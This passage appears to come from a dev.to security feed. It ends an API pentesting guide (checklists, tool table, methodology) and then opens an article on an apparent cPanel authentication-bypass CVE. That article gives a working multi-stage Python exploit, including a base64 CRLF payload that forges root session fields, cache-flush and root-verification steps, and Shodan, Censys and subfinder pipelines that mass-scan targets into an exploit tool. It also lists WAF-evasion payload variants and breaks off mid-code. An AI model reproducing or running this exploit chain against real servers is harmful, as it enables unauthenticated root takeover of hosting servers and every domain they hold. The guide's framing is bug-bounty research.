https://github.com/swisskyrepo/GraphQLmap</code></td> </tr> <tr> <td><strong>linkfinder</strong></td> <td>Extract endpoints from JavaScript</td> <td><code>git clone https://github.com/GerbenJavado/LinkFinder</code></td> </tr> <tr> <td><strong>x8</strong></td> <td>Hidden parameter fuzzer (better than Arjun for some cases)</td> <td><code>git clone https://github.com/Sh1Yo/x8</code></td> </tr> <tr> <td><strong>mitmproxy2swagger</strong></td> <td>Convert captured traffic to OpenAPI spec</td> <td><code>pip install mitmproxy2swagger</code></td> </tr> <tr> <td><strong>ddosify</strong></td> <td>Load testing and rate-limit testing</td> <td><code>go install github.com/ddosify/ddosify@latest</code></td> </tr> <tr> <td><strong>jsubfinder</strong></td> <td>JavaScript subdomain discovery</td> <td><code>go install github.com/ThreatUnkown/jsubfinder@latest</code></td> </tr> </tbody> </table></div> <h2> Additional Attack Checklists </h2> <h3> Checklist: API Authentication Testing </h3> <ul> <li>[ ] Test with <strong>no</strong> auth header</li> <li>[ ] Test with <strong>empty</strong> auth header</li> <li>[ ] Test with <strong>null</strong> auth header</li> <li>[ ] Test with <strong>arbitrary</strong> token</li> <li>[ ] Test JWT <strong>algorithm confusion</strong> (RS256→HS256)</li> <li>[ ] Test JWT <strong>"none" algorithm</strong> </li> <li>[ ] Test JWT <strong>JWK injection</strong> </li> <li>[ ] Test JWT <strong>kid injection</strong> (path traversal, SQLi)</li> <li>[ ] Test JWT <strong>expired token</strong> acceptance</li> <li>[ ] Test JWT <strong>claim modification</strong> (role escalation)</li> <li>[ ] Test <strong>API key in URL parameters</strong> </li> <li>[ ] Test <strong>API key in request body</strong> </li> <li>[ ] Test <strong>API key in headers</strong> (X-API-Key, X-Token, etc.)</li> <li>[ ] Test <strong>rate limit bypass</strong> via IP spoofing headers</li> <li>[ ] Test <strong>rate limit bypass</strong> via HTTP method alternation</li> <li>[ ] Test <strong>rate limit bypass</strong> via parameter pollution</li> </ul> <h3> Checklist: Authorization Testing </h3> <ul> <li>[ ] Test <strong>IDOR on user IDs</strong> (sequential enumeration)</li> <li>[ ] Test <strong>IDOR on UUIDs</strong> (if pattern predictable)</li> <li>[ ] Test <strong>IDOR on invoices, orders, tickets, messages</strong> </li> <li>[ ] Test <strong>mass IDOR via parameter pollution</strong> (<code>?id=1&amp;id=2</code>)</li> <li>[ ] Test <strong>mass IDOR via array parameters</strong> (<code>?id[]=1&amp;id[]=2</code>)</li> <li>[ ] Test <strong>BFLA — horizontal</strong> (same-role user accessing other users' data)</li> <li>[ ] Test <strong>BFLA — vertical</strong> (low-priv user accessing admin endpoints)</li> <li>[ ] Test <strong>mass assignment</strong> on POST/PUT/PATCH endpoints</li> <li>[ ] Test <strong>hidden parameters</strong> that affect permissions</li> </ul> <h3> Checklist: Injection Testing </h3> <ul> <li>[ ] Test <strong>SQLi</strong> in GET parameters</li> <li>[ ] Test <strong>SQLi</strong> in POST JSON body</li> <li>[ ] Test <strong>SQLi</strong> in headers</li> <li>[ ] Test <strong>NoSQLi</strong> in JSON body (<code>$ne</code>, <code>$regex</code>, <code>$gt</code>, <code>$where</code>)</li> <li>[ ] Test <strong>command injection</strong> in parameters</li> <li>[ ] Test <strong>command injection</strong> in file upload filenames</li> <li>[ ] Test <strong>blind command injection</strong> with OOB (Collaborator)</li> <li>[ ] Test <strong>SSRF</strong> on URL-fetching endpoints</li> <li>[ ] Test <strong>SSRF</strong> on file upload/avatar/profile endpoints</li> <li>[ ] Test <strong>SSRF</strong> to cloud metadata endpoints (AWS/GCP/Azure/Alibaba)</li> <li>[ ] Test <strong>SSRF</strong> to internal services</li> <li>[ ] Test <strong>XXE</strong> in XML-based API endpoints</li> </ul> <h3> Checklist: Business Logic Testing </h3> <ul> <li>[ ] Test <strong>race conditions</strong> (coupon redemption, money transfer, checkout)</li> <li>[ ] Test <strong>integer overflow/underflow</strong> (negative quantities, huge amounts)</li> <li>[ ] Test <strong>OTP bypass</strong> (wildcards, reuse, session decoupling)</li> <li>[ ] Test <strong>price manipulation</strong> in cart/checkout</li> <li>[ ] Test <strong>coupon/ promo code</strong> abuse (stacking, reusing, race condition)</li> <li>[ ] Test <strong>pagination abuse</strong> to access hidden data</li> <li>[ ] Test <strong>sort/filter injection</strong> (sorting by unexposed fields)</li> </ul> <h3> Checklist: GraphQL-Specific Testing </h3> <ul> <li>[ ] Test <strong>introspection</strong> (standard query)</li> <li>[ ] Test <strong>introspection bypass</strong> (different content-type, GET request)</li> <li>[ ] Test <strong>batching</strong> to bypass rate limits</li> <li>[ ] Test <strong>deeply nested queries</strong> for DoS</li> <li>[ ] Test <strong>field duplication</strong> for resource exhaustion</li> <li>[ ] Test <strong>alias abuse</strong> (thousands of aliases in one query)</li> <li>[ ] Test <strong>argument injection</strong> (SQLi, NoSQLi within GraphQL args)</li> <li>[ ] Test <strong>authorization</strong> — can User A query User B's data?</li> <li>[ ] Test <strong>mutations</strong> — can unauthenticated user call mutations?</li> <li>[ ] Test <strong>directive-based auth bypass</strong> (<code>@skip</code>, <code>@include</code>)</li> </ul> <h2> Final Methodology — The API Pentest Flowchart </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> ┌─────────────────────┐ │ Define Scope &amp; │ │ Get Authorization │ └─────────┬───────────┘ │ ┌─────────▼───────────┐ │ Phase 1: Recon │ │ - Passive (gau, │ │ wayback, crt.sh) │ │ - Active (ffuf, │ │ subfinder) │ └─────────┬───────────┘ │ ┌─────────▼───────────┐ │ Phase 2: Fingerprint │ │ - Identify API type │ │ - Find Swagger/docs │ │ - Extract endpoints │ └─────────┬───────────┘ │ ┌───────────────┼───────────────┐ │ │ │ ┌─────────▼────────┐ ┌───▼──────┐ ┌──────▼─────────┐ │ Phase 3: Auth │ │Phase 4: │ │ Phase 5: │ │ &amp; AuthZ Testing │ │Injection │ │ Business Logic │ │ - JWT manipulation│ │ - SQLi │ │ - Race cond. │ │ - IDOR/BOLA │ │ - NoSQLi │ │ - Mass assign │ │ - BFLA │ │ - SSRF │ │ - OTP bypass │ │ - Mass assign │ │ - Cmd inj│ │ - Pricing bugs │ └─────────┬────────┘ └───┬──────┘ └──────┬─────────┘ │ │ │ └───────────────┼───────────────┘ │ ┌─────────▼───────────┐ │ Phase 6: Exploit │ │ Chaining │ │ - Combine findings │ │ - Escalate impact │ │ - Demonstrate RCE │ └─────────┬───────────┘ │ ┌─────────▼───────────┐ │ Phase 7: Report │ │ - Write findings │ │ - Provide PoC │ │ - Recommend fixes │ │ - Retest fixes │ └─────────────────────┘ </code></pre> </div> <h2> Key Principles to Remember </h2> <ol> <li><p><strong>Every undocumented endpoint is a potential bypass.</strong> The endpoints not in the Swagger docs are the ones most likely to lack proper auth.</p></li> <li><p><strong>If it's not in the documentation, test it harder.</strong> Hidden endpoints, old API versions (v1, v2), debug endpoints, and staging subdomains are goldmines.</p></li> <li><p><strong>Authentication bypass on one endpoint means trying it on every endpoint.</strong> If you find a JWT "none" algorithm works on <code>/v1/users</code>, it will likely work on <code>/v1/admin/users</code> too.</p></li> <li><p><strong>Business logic &gt; technical complexity</strong> for the highest bounties. Race conditions on financial transactions, coupon stacking, and OTP bypasses often pay more than straightforward SQLi.</p></li> <li><p><strong>Chain everything.</strong> A low-severity IDOR + a medium-severity rate-limit bypass = critical account takeover. Never report findings in isolation — always ask "what can I combine this with?"</p></li> <li><p><strong>APIs don't have visual feedback.</strong> Unlike web apps where you can see if a button appeared, API testing requires careful analysis of response differences — status codes, response body length, timing differences, and error messages all matter.</p></li> <li><p><strong>Test in this order:</strong> Recon → Auth → AuthZ → Injection → Business Logic. Don't jump to SQLi before you've mapped the full endpoint surface and tested for auth bypasses.</p></li> <li><p><strong>Stay organized.</strong> Use Burp Collections, Postman environments, or just organized curl scripts. The tester who can reproduce a finding reliably wins over the one who found it by accident.</p></li> </ol> <p><strong>Happy hunting. Stay authorized, stay methodical, and dig deeper than everyone else.</strong></p> <p><em>This guide is for authorized penetration testing and bug bounty hunting only. All techniques should be performed against targets you have explicit written permission to test. Unauthorized testing is illegal under the CFAA and similar laws worldwide.</em></p> <p>GitHub: <a href="https://github.com/SecurityTalent" rel="noopener noreferrer">SecurityTalent </a>| Medium: <a href="https://securitytalent.medium.com/" rel="noopener noreferrer">Security Talent</a> | Twitter: <a href="https://x.com/Securi3yTalent" rel="noopener noreferrer">Securi3yTalent</a> | Facebook: <a href="https://www.facebook.com/Securi3ytalent" rel="noopener noreferrer">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent" rel="noopener noreferrer">Securi3yTalent</a></p> <h1> CyberSecurity #BugBounty #APISecurity #EthicalHacking #WebSecurity #InfoSec #BugBountyHunter #OWASP #PenTesting #APIHacking </h1> apisecurity apihacking apirecon apisecuritytesting Md Hehedi Hasan Sun, 03 May 2026 19:16:08 +0000 https://dev.to/securitytalent/cve-2026-41940-bug-bounty-hunters-guide-to-cpanels-crlf-authentication-bypass-1lb9 https://dev.to/securitytalent/cve-2026-41940-bug-bounty-hunters-guide-to-cpanels-crlf-authentication-bypass-1lb9 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqsl3wx9svr69c6vgv1q.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqsl3wx9svr69c6vgv1q.webp" alt=" " width="800" height="533"></a><br> <em>A technical deep-dive for bug bounty hunters targeting CVE-2026–41940 — reconnaissance, exploitation chains, WAF bypasses, and report writing for maximum impact.</em></p> <h2> Why This Matters for Bug Bounty </h2> <p>CVE-2026–41940 is the kind of vulnerability that defines a bug bounty career. It's a <strong>CVSS 10.0</strong>, unauthenticated, remote root compromise affecting <strong>~70 million domains</strong> — and it was exploited in the wild as a zero-day for over two months before disclosure.</p> <p>For bug bounty hunters, this represents:</p> <ul> <li> <strong>Maximum severity</strong> — This is as critical as it gets. P1/Critical across every program.</li> <li> <strong>Massive attack surface</strong> — cPanel runs ~94% of the web hosting control panel market. Every shared hosting provider, every reseller, every managed WordPress host.</li> <li> <strong>Clear impact chain</strong> — Authentication bypass → root-level WHM access → full server compromise → all hosted domains owned.</li> <li> <strong>Multiple bounty opportunities</strong> — cPanel's own bug bounty, hosting provider programs, infrastructure bug bounty platforms.</li> </ul> <p>Let's break down exactly how to hunt, exploit, and report this vulnerability.</p> <h2> Understanding the Vulnerability </h2> <p>Before you hunt, you need to understand — not just run a tool.</p> <h3> The Root Cause </h3> <p>In cPanel's <code>Session.pm</code>, the <code>saveSession()</code> function calls <code>filter_sessiondata()</code> — the sanitization routine — <strong>after</strong> the session file has already been written to disk.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Normal flow: sanitize → write ✓ Vulnerable: write → sanitize ✗ </code></pre> </div> <p>This means CRLF sequences (<code>\r\n</code>) embedded in the <code>Authorization: Basic</code> header value are written verbatim into <code>/var/cpanel/sessions/raw/&lt;session&gt;</code> before any filtering occurs.</p> <h3> The Injected Payload </h3> <p>When base64-decoded, the Authorization password field contains:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight properties"><code><span class="err">x</span> <span class="py">successful_internal_auth_with_timestamp</span><span class="p">=</span><span class="s">9999999999</span> <span class="py">user</span><span class="p">=</span><span class="s">root</span> <span class="py">tfa_verified</span><span class="p">=</span><span class="s">1</span> <span class="py">hasroot</span><span class="p">=</span><span class="s">1</span> </code></pre> </div> <p>These become newline-separated keys in the session file. When <code>cpsrvd</code> re-parses the file, it treats them as legitimate session attributes belonging to an authenticated root user.</p> <h3> The Auth Bypass Mechanism </h3> <p>cPanel's <code>docheckpass_whostmgrd()</code> checks for <code>successful_internal_auth_with_timestamp</code> <strong>before</strong> consulting <code>/etc/shadow</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="k">if</span> <span class="p">(</span><span class="nv">$successful_external_auth_with_timestamp</span> <span class="ow">or</span> <span class="nv">$successful_internal_auth_with_timestamp</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nv">$</span><span class="nn">Cpanel::Server::</span><span class="nv">AUTH_OK</span><span class="p">,</span> <span class="mi">0</span><span class="p">;</span> <span class="c1"># Password check SKIPPED</span> <span class="p">}</span> </code></pre> </div> <p>If that timestamp exists, password validation is bypassed entirely. The attacker set it to <code>9999999999</code>. Access granted.</p> <h2> Reconnaissance — Finding Vulnerable Targets </h2> <h3> Shodan Hunting </h3> <p>The most efficient way to find targets at scale:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Broad WHM search</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WHM Login"'</span> <span class="nt">--limit</span> 1000 <span class="c"># cPanel-specific on SSL port</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'product:"cPanel" port:2083'</span> <span class="nt">--limit</span> 1000 <span class="c"># WHM on admin port</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WebHost Manager" port:2087'</span> <span class="nt">--limit</span> 1000 <span class="c"># SSL certificate-based</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'ssl.cert.subject.cn:"cPanel" port:2087'</span> <span class="nt">--limit</span> 1000 </code></pre> </div> <p>Direct pipeline to cPanelSniper:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WHM Login"'</span> | <span class="se">\</span> <span class="nb">awk</span> <span class="s1">'{print "https://"$1":"$2}'</span> | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 50 <span class="nt">-o</span> shodan_results.json </code></pre> </div> <h3> Subdomain Enumeration </h3> <p>For bug bounty programs with specific scope:</p> <p><strong>Subfinder</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Subfinder → httpx → cPanelSniper</span> subfinder <span class="nt">-d</span> target.com <span class="nt">-silent</span> | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 50 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <p><strong>Amass</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Amass for broader coverage</span> amass enum <span class="nt">-d</span> target.com | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 100 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <h3> Google Dorking </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>inurl:":2087" "WHM Login" inurl:":2083" "cPanel" intitle:"WHM Login" "WebHost Manager" inurl:"/cpsess" "login_only" </code></pre> </div> <h3> Certificate Transparency Logs </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># crt.sh for domain discovery</span> curl <span class="nt">-s</span> <span class="s2">"https://crt.sh/?q=%25.target.com%25&amp;output=json"</span> | <span class="se">\</span> jq <span class="nt">-r</span> <span class="s1">'.[].name_value'</span> | <span class="se">\</span> <span class="nb">sort</span> <span class="nt">-u</span> | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 100 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <h3> Censys </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Censys search (requires API key)</span> censys search <span class="s1">'services.service_name: "cPanel" and services.port: 2087'</span> <span class="se">\</span> <span class="nt">--pages</span> 5 | <span class="se">\</span> jq <span class="nt">-r</span> <span class="s1">'.[] | "https://\(.ip):2087"'</span> | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> censys_results.json </code></pre> </div> <h2> The Exploitation Chain — What Actually Happens </h2> <h3> Stage 0: Canonical Hostname Discovery </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">base64</span><span class="p">,</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span> <span class="k">def</span> <span class="nf">discover_hostname</span><span class="p">(</span><span class="n">target</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/openid_connect/cpanelid</span><span class="sh">"</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Follow 307 to extract real hostname </span> <span class="k">return</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Location</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Contains canonical hostname </span></code></pre> </div> <p><strong>Why this matters:</strong> cPanel validates the <code>Host</code> header internally. If it doesn't match the server's canonical hostname, the exploit fails silently. <strong>Always auto-discover.</strong></p> <h3> Stage 1: Mint the Preauth Session </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">mint_session</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="sh">"</span><span class="s">user=root&amp;pass=wrong</span><span class="sh">"</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">application/x-www-form-urlencoded</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Content-Length</span><span class="sh">"</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">body</span><span class="p">))</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/login/?login_only=1</span><span class="sh">"</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Extract session cookie </span> <span class="n">cookie</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Set-Cookie</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Parse: whostmgrsession=%3aSESSION_NAME%2cOB_HEX </span> <span class="n">session</span> <span class="o">=</span> <span class="n">cookie</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">=</span><span class="sh">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">%2c</span><span class="sh">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nf">strip</span><span class="p">()</span> <span class="c1"># URL decode if needed </span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">unquote</span> <span class="k">return</span> <span class="nf">unquote</span><span class="p">(</span><span class="n">session</span><span class="p">)</span> <span class="c1"># Returns ":SESSION_NAME" </span></code></pre> </div> <p><strong>Key insight:</strong> The session name (before <code>%2C</code>) is what we need. The OB hash after <code>%2C</code> is discarded — that's what makes the injection possible in the first place.</p> <h3> Stage 2: CRLF Injection </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">inject_crlf</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="c1"># The CRLF payload - base64 of: </span> <span class="c1"># x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\n </span> <span class="c1"># user=root\r\ntfa_verified=1\r\nhasroot=1 </span> <span class="n">payload_b64</span> <span class="o">=</span> <span class="sh">"</span><span class="s">cm9vdDp4DQoNCnN1Y2Nlc3NmdWxfaW50ZXJuYWxfYXV0aF93aXRoX3RpbWVzdGFtcD05OTk5OTk5OTk5DQp1c2VyPXJvb3QNCnRmYV92ZXJpZmllZD0xDQpoYXNyb290PTE=</span><span class="sh">"</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic </span><span class="si">{</span><span class="n">payload_b64</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="n">location</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Location</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="c1"># Extract token from Location header </span> <span class="kn">import</span> <span class="n">re</span> <span class="n">token_match</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">/cpsess(\d+)</span><span class="sh">'</span><span class="p">,</span> <span class="n">location</span><span class="p">)</span> <span class="k">if</span> <span class="n">token_match</span><span class="p">:</span> <span class="k">return</span> <span class="n">token_match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># /cpsessXXXXXX </span> <span class="k">return</span> <span class="bp">None</span> </code></pre> </div> <p><strong>Bug bounty tip:</strong> The <code>Location</code> header in the 307 response contains your session token. This is what you use in subsequent requests. Save it.</p> <h3> Stage 3: The Cache Flush (<code>do_token_denied</code> Gadget) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">flush_cache</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="c1"># Request without valid token → triggers do_token_denied </span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/scripts2/listaccts</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Expected: 401 Token Denied </span> <span class="c1"># BUT the raw session data is now flushed into JSON cache </span> <span class="k">return</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span> </code></pre> </div> <p><strong>Critical nuance:</strong> This step is often overlooked. Without the cache flush, the injected fields exist only in the raw session file. The <code>do_token_denied</code> handler calls <code>Modify::new(nocache =&gt; 1)</code> which re-parses the raw file and writes the result into the JSON cache. Only then are the injected fields active.</p> <h3> Stage 4: Verify Root Access </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">verify_root</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">token</span><span class="si">}</span><span class="s">/json-api/version?api.version=1</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="n">data</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">read</span><span class="p">().</span><span class="nf">decode</span><span class="p">()</span> <span class="k">if</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span> <span class="o">==</span> <span class="mi">200</span> <span class="ow">and</span> <span class="sh">'"</span><span class="s">result</span><span class="sh">"</span><span class="s">:1</span><span class="sh">'</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="kn">import</span> <span class="n">json</span> <span class="n">version</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">data</span><span class="p">)[</span><span class="sh">"</span><span class="s">cpanelresult</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">data</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">version</span><span class="sh">"</span><span class="p">]</span> <span class="k">return</span> <span class="bp">True</span><span class="p">,</span> <span class="n">version</span> <span class="k">return</span> <span class="bp">False</span><span class="p">,</span> <span class="bp">None</span> </code></pre> </div> <h2> WAF Bypass Techniques </h2> <p>Bug bounty targets often have WAFs. Here's how to evade them:</p> <h3> 1. Alternative CRLF Encodings </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Instead of standard \r\n, try: </span><span class="n">payloads</span> <span class="o">=</span> <span class="p">[</span> <span class="c1"># Standard </span> <span class="sh">"</span><span class="s">cm9vdDp4DQpzdWNjZXNzZnVs...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># URL-encoded \r\n </span> <span class="sh">"</span><span class="s">cm9vdDp4%0d%0asuccessful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Double URL-encode </span> <span class="sh">"</span><span class="s">cm9vdDp4%250d%250asuccessful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Unicode variation </span> <span class="sh">"</span><span class="s">cm9vdDp4</span><span class="se">\u000d\u000a</span><span class="s">successful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Tab instead of CR </span> <span class="sh">"</span><span class="s">cm9vdDp4</span><span class="se">\t</span><span class="s">successful...</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <h3> 2. Authorization Header Variations </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">headers_variants</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span 